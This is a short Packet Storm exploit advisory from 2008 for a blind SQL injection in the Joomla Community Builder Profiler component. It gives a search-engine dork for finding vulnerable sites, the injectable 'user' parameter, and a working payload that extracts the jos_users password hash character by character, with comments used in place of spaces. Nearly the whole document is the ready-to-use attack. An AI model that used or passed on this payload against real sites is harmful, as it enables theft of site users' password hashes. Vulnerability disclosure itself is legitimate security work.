joomlaprofiler-sql.txt

2008-04-24T00:00:00
ID PACKETSTORM:65729
Type packetstorm
Reporter $hur!k'n
Modified 2008-04-24T00:00:00

Description

                                        
                                            `#########################################################  
# #  
# Joomla Component Profiler Blind SQL Injection #  
# #  
#########################################################  
  
  
########################################  
  
[~] Vulnerability found by: $hur!k'n  
[~] Contact: alibabanala@hotmail.com  
  
########################################  
  
[~] ScriptName: "Joomla"  
[~] ModuleName: "Profiler"  
[~] Version: ?   
  
########################################  
  
[~] DORK: allinurl:com_comprofiler  
  
########################################  
  
[~] Exploit: /index.php?option=com_comprofiler&task=userProfile&user=[SQL]  
[~] Example: /index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*  
  
########################################  
`